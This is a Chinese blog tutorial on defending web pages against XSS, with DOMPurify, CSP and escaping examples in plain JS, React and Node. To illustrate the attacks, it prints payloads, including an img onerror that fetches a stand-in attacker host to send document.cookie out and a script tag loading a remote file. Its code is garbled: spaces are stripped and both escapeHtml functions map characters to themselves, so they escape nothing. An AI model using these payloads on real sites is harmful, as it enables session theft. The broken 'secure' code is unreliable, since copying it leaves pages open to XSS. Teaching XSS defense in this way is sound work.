大数据领域分布式计算的混合计算模式
2026/1/15 20:27:58
别瞎搞!XSS不是用来干坏事的,但你得懂它怎么防
- 别瞎搞!XSS不是用来干坏事的,但你得懂它怎么防
- 听说你想“注入链接”?先醒醒!
- XSS到底是个啥玩意儿
- 三种经典姿势(别想歪)
- 反射型:URL 里藏雷,一点就炸
- 存储型:评论区埋地雷
- DOM 型:纯前端也能翻车
- 为啥XSS这么让人头疼?
- 真实项目里XSS是怎么冒出来的?
- 遇到XSS怎么排查?(老司机三板斧)
- 防XSS实战技巧(亲测有效,不忽悠)
- 1. 永远不要相信任何输入
- 2. 能用 textContent 就别碰 innerHTML
- 3. 富文本白名单过滤,DOMPurify 一把梭
- 4. CSP:浏览器帮你站岗
- 5. 前端路由 vigilante
- 6. 本地数据也要验
- 完整代码示例:一个“带刺”的搜索页如何安全落地
- 再来一个:React 项目里的“安全”与“不安全”
- 彩蛋:用 Node 给富文本后端也加闸
- 你以为学完就能“搞事情”?
- 大实话结尾
别瞎搞!XSS不是用来干坏事的,但你得懂它怎么防
友情提示:本文全程碎碎念,代码比字多,看完还不会防XSS,你来深圳请我喝奶茶,我当面给你调试到哭。
听说你想“注入链接”?先醒醒!
周五晚上十一点,我正窝在工位改 bug,产品突然@我:
“哥,用户反馈点了个搜索链接,账号里的券全没了,是不是你们前端又瞎拼接 URL 了?”
我心里“咯噔”一下,赶紧打开监控,Console 里一条红得发紫的报错:Uncaught SyntaxError: Unexpected token '<'
再瞄一眼 URL——好家伙,搜索词里塞了段<script src="//xss.pt/laoge.js"></script>,
浏览器还贴心地帮我执行了。
那一刻,我深刻体会到什么叫“社会性死亡”。
XSS到底是个啥玩意儿
说人话:Cross-Site Scripting,跨站脚本攻击,
就是坏人把你网页当画板,在上面乱涂乱“脚本”。
涂完了,用户一访问,浏览器傻乎乎地执行,
Cookie、token、甚至银行卡余额,统统打包送黑客。
(别问为啥不叫 CSS,问就是被层叠样式表先抢注了。)
三种经典姿势(别想歪)
反射型:URL 里藏雷,一点就炸
用户点开https://kao.la/search?kw=<script>alert(document.cookie)</script>,
后端把 kw 原样吐回前端,前端直接innerHTML = kw,
浏览器一看,哟,脚本,走你!
全程不落地,像快递小哥“即拿即送”,所以叫“反射”。
存储型:评论区埋地雷
用户 A 发条留言:
“楼主好人一生平安!<img src=x οnerrοr=fetch(‘//xss.pt/steal?c=’+document.cookie)>”
后端存进数据库,前端拉回来展示,
所有围观群众一打开帖子,Cookie 被悄咪咪顺走。
地雷一直躺在那,谁踩谁炸,持久又酸爽。
DOM 型:纯前端也能翻车
不写后端也能中招,典范就是“路由劫持”。https://kao.la/#/<img src=x onerror=alert(1)>
前端路由用location.hash拼页面标题:title.innerHTML = '搜索结果:' + decodeURIComponent(location.hash.slice(1))
得,又一颗雷。
(别笑,我当年真这么写过,还被挂在公司耻辱柱上。)
为啥XSS这么让人头疼?
它不黑服务器,只黑用户,
可用户一沦陷,服务器照样背锅。
想象一下:
大促零点,用户 A 被 XSS 偷了登录态,
黑客拿 token 去下单 100 台 iPhone,
第二天客服电话被打爆,
老板一句“谁写的代码谁赔”,
工资瞬间变负数。
浏览器再智能,也架不住开发亲手给黑客递刀。
真实项目里XSS是怎么冒出来的?
富文本编辑器“裸奔”
后台配置了个“支持 HTML”,
运营小姐姐开开心心贴了一段从 Word 拷来的表格,
里面暗藏<script>,
前端为了“所见即所得”,直接v-html渲染,
全站用户一起蹦迪。动态拼接 HTML 图省事
列表页要标红关键词,后端返回纯文本,
前端:item.innerHTML=`${userInput}`.replace(/关键词/g,'<em>关键词</em>')用户输入一坨:
<img src=x onerror=alert(1)>关键词
得,又炸。URL 参数塞 innerHTML
活动页要展示“来自微信的某某”,
前端:document.getElementById('from').innerHTML=getQuery('name')黑客把 name 换成
<script src="//xss.pt/laoge.js">,
活动页秒变钓鱼站。
遇到XSS怎么排查?(老司机三板斧)
打开 DevTools,Console 先看红字
报错行号怼脸,顺着堆栈找innerHTML、document.write、eval这些高危 API。手动插 payload 测试
输入框、搜索栏、URL 参数、hash、localStorage,
挨个试:"><img src=x onerror=confirm(1)> <svg onload=alert(1)> javascript:alert(1)哪个弹窗=哪里裸奔。
全局搜“=”号
对,就是暴力搜innerHTML=、html(、dangerouslySetInnerHTML,
凡是不带转义/过滤的,全部拉出来枪毙五分钟。
防XSS实战技巧(亲测有效,不忽悠)
1. 永远不要相信任何输入
产品、运营、甚至你自己昨天的代码,都可能埋雷。
把“所有外来内容都当屎”写在工位贴上,每天默念三遍。
2. 能用 textContent 就别碰 innerHTML
// ❌ 作死写法div.innerHTML=userNick// ✅ 老实人写法div.textContent=userNick实在要渲染 HTML,先“消毒”——
3. 富文本白名单过滤,DOMPurify 一把梭
<scriptsrc="https://cdn.jsdelivr.net/npm/dompurify@3/dist/purify.min.js"></script><script>// 允许的标签&属性白名单constclean=DOMPurify.sanitize(dirtyHTML,{ALLOWED_TAGS:['p','br','strong','em','a','img'],ALLOWED_ATTR:['href','src','alt'],ALLOW_DATA_ATTR:false})document.getElementById('post').innerHTML=clean</script>别自己写正则,你把握不住,真的。
4. CSP:浏览器帮你站岗
HTTP 响应头加一行:
Content-Security-Policy: default-src 'self'; script-src 'self' https://static.kuaishou.com; object-src 'none'即使黑客塞了<script>,浏览器直接拦截,
妈妈再也不用担心我加班到秃头。
5. 前端路由 vigilante
// 路由守卫里做一层转义functionescapeHtml(str){returnstr.replace(/&/g,'&').replace(/</g,'<').replace(/>/g,'>').replace(/"/g,'"').replace(/'/g,''')}// 使用constkeyword=escapeHtml(decodeURIComponent(location.hash.slice(1)))document.title=`搜索结果:${keyword}`别嫌土,能救命。
6. 本地数据也要验
localStorage、sessionStorage、cookie 里拿出来的东西,
指不定哪天被插件/代理篡改,
用 JSON Schema 过一遍,再丢进页面。
完整代码示例:一个“带刺”的搜索页如何安全落地
需求:用户输入关键词,高亮展示,还要保留换行。
危险点:关键词能塞脚本,换行要变<br>,得渲染 HTML。
<!DOCTYPEhtml><htmllang="zh-CN"><head><metacharset="utf-8"/><!-- 1. CSP 站岗 --><metahttp-equiv="Content-Security-Policy"content="default-src'self'; script-src'self'https://cdn.jsdelivr.net; style-src'self''unsafe-inline';"/><title>安全搜索示例</title><style>.highlight{background:#ff0}#result{white-space:pre-line;border:1px solid #ccc;padding:10px}</style></head><body><inputid="kw"placeholder="输入关键词,按回车搜索"/><buttononclick="search()">Search</button><divid="result"></div><!-- 2. 引入 DOMPurify --><scriptsrc="https://cdn.jsdelivr.net/npm/dompurify@3/dist/purify.min.js"></script><script>// 3. 转义函数functionescapeHtml(str){constmap={'&':'&','<':'<','>':'>','"':'"',"'":'''}returnstr.replace(/[&<>"']/g,m=>map[m])}// 4. 搜索逻辑functionsearch(){constraw=document.getElementById('kw').valueif(!raw)return// 先转义,再处理换行,再高亮letsafe=escapeHtml(raw)// Step1 转义safe=safe.replace(/\n/g,'<br>')// Step2 换行// 高亮关键词(此时已是纯文本,可放心 replace)constregex=newRegExp(`(${raw.replace(/[.*+?^${}()|[\]\\]/g,'\\$&')})`,'gi')consthighlighted=safe.replace(regex,'<span class="highlight">$1</span>')// Step3 过 DOMPurify 二次消毒(防自己手抖)constfinal=DOMPurify.sanitize(highlighted,{ALLOWED_TAGS:['span','br'],ALLOWED_ATTR:['class']})document.getElementById('result').innerHTML=final}// 5. URL 参数回显同样走一遍constparams=newURLSearchParams(location.search)constq=params.get('q')if(q){document.getElementById('kw').value=qsearch()}</script></body></html>上面的流程:
输入 → 转义 → 业务替换 → 白名单消毒 → 渲染。
四层盔甲,黑客拿头都撞不开。
再来一个:React 项目里的“安全”与“不安全”
// ❌ 作死现场 function Vulnerable({ userUrl }) { // 把用户提供的 url 直接插背景 return <div style={{ backgroundImage: `url(${userUrl})` }} /> } // 黑客传:'); background-image:url('javascript:alert(1) // React 会报警告,但仍可能执行,别赌 // ✅ 正确姿势 import DOMPurify from 'dompurify' function Safe({ userUrl }) { // 先过白名单 const clean = DOMPurify.sanitize(userUrl, { ALLOWED_TAGS: [], ALLOWED_ATTR: [] }) // 再加一层 URL 校验 const isValid = /^https?:\/\/i\.xiaohongshu\.com\//.test(clean) if (!isValid) return null return <div style={{ backgroundImage: `url(${clean})` }} /> }记住:React 的dangerouslySetInnerHTML名字都告诉你“危险”了,
别头铁。
彩蛋:用 Node 给富文本后端也加闸
constexpress=require('express')constDOMPurify=require('isomorphic-dompurify')constapp=express()app.use(express.json())app.post('/api/comment',(req,res)=>{const{content}=req.body// 后端再消毒一次,防止有人绕过前端直接调接口constclean=DOMPurify.sanitize(content,{ALLOWED_TAGS:['p','br','a','strong','em'],ALLOWED_ATTR:['href']})saveToDB(clean)res.json({ok:1})})前后端双杀,黑客只能去楼下沙县小吃冷静一下。
你以为学完就能“搞事情”?
省省吧,兄弟。
真正值钱的能力是“让黑客无洞可钻”,
不是“钻别人洞”。
国内 SRC 平台(阿里、腾讯、字节都有)大把合法靶场,
去那练手,提交漏洞还能拿奖金,
不比偷偷摸摸进局子喝茶香?
大实话结尾
你写的每一行没转义的代码,
都是给黑客的邀请函;
你偷的每一个懒,
都可能变成明天凌晨三点的 P0 故障。
把“安全第一”刻进骨子里,
再谈优雅、谈性能、谈 KPI。
毕竟——
“代码能跑”只是及格线,
“代码能扛黑客”才配叫技术人。
(全文完,我要去给三年前的自己擦屁股了,告辞。)
欢迎来到我的博客,很高兴能够在这里和您见面!希望您在这里可以感受到一份轻松愉快的氛围,不仅可以获得有趣的内容和知识,也可以畅所欲言、分享您的想法和见解。
推荐:DTcode7的博客首页。
一个做过前端开发的产品经理,经历过睿智产品的折磨导致脱发之后,励志要翻身农奴把歌唱,一边打入敌人内部一边持续提升自己,为我们广大开发同胞谋福祉,坚决抵制睿智产品折磨我们码农兄弟!
| 专栏系列(点击解锁) | 学习路线(点击解锁) | 知识定位 |
|---|---|---|
| 《微信小程序相关博客》 | 持续更新中~ | 结合微信官方原生框架、uniapp等小程序框架,记录请求、封装、tabbar、UI组件的学习记录和使用技巧等 |
| 《AIGC相关博客》 | 持续更新中~ | AIGC、AI生产力工具的介绍,例如stable diffusion这种的AI绘画工具安装、使用、技巧等总结 |
| 《HTML网站开发相关》 | 《前端基础入门三大核心之html相关博客》 | 前端基础入门三大核心之html板块的内容,入坑前端或者辅助学习的必看知识 |
| 《前端基础入门三大核心之JS相关博客》 | 前端JS是JavaScript语言在网页开发中的应用,负责实现交互效果和动态内容。它与HTML和CSS并称前端三剑客,共同构建用户界面。 通过操作DOM元素、响应事件、发起网络请求等,JS使页面能够响应用户行为,实现数据动态展示和页面流畅跳转,是现代Web开发的核心 | |
| 《前端基础入门三大核心之CSS相关博客》 | 介绍前端开发中遇到的CSS疑问和各种奇妙的CSS语法,同时收集精美的CSS效果代码,用来丰富你的web网页 | |
| 《canvas绘图相关博客》 | Canvas是HTML5中用于绘制图形的元素,通过JavaScript及其提供的绘图API,开发者可以在网页上绘制出各种复杂的图形、动画和图像效果。Canvas提供了高度的灵活性和控制力,使得前端绘图技术更加丰富和多样化 | |
| 《Vue实战相关博客》 | 持续更新中~ | 详细总结了常用UI库elementUI的使用技巧以及Vue的学习之旅 |
| 《python相关博客》 | 持续更新中~ | Python,简洁易学的编程语言,强大到足以应对各种应用场景,是编程新手的理想选择,也是专业人士的得力工具 |
| 《sql数据库相关博客》 | 持续更新中~ | SQL数据库:高效管理数据的利器,学会SQL,轻松驾驭结构化数据,解锁数据分析与挖掘的无限可能 |
| 《算法系列相关博客》 | 持续更新中~ | 算法与数据结构学习总结,通过JS来编写处理复杂有趣的算法问题,提升你的技术思维 |
| 《IT信息技术相关博客》 | 持续更新中~ | 作为信息化人员所需要掌握的底层技术,涉及软件开发、网络建设、系统维护等领域的知识 |
| 《信息化人员基础技能知识相关博客》 | 无论你是开发、产品、实施、经理,只要是从事信息化相关行业的人员,都应该掌握这些信息化的基础知识,可以不精通但是一定要了解,避免日常工作中贻笑大方 | |
| 《信息化技能面试宝典相关博客》 | 涉及信息化相关工作基础知识和面试技巧,提升自我能力与面试通过率,扩展知识面 | |
| 《前端开发习惯与小技巧相关博客》 | 持续更新中~ | 罗列常用的开发工具使用技巧,如 Vscode快捷键操作、Git、CMD、游览器控制台等 |
| 《photoshop相关博客》 | 持续更新中~ | 基础的PS学习记录,含括PPI与DPI、物理像素dp、逻辑像素dip、矢量图和位图以及帧动画等的学习总结 |
| 日常开发&办公&生产【实用工具】分享相关博客》 | 持续更新中~ | 分享介绍各种开发中、工作中、个人生产以及学习上的工具,丰富阅历,给大家提供处理事情的更多角度,学习了解更多的便利工具,如Fiddler抓包、办公快捷键、虚拟机VMware等工具 |
吾辈才疏学浅,摹写之作,恐有瑕疵。望诸君海涵赐教。望轻喷,嘤嘤嘤
非常期待和您一起在这个小小的网络世界里共同探索、学习和成长。愿斯文对汝有所裨益,纵其简陋未及渊博,亦足以略尽绵薄之力。倘若尚存阙漏,敬请不吝斧正,俾便精进!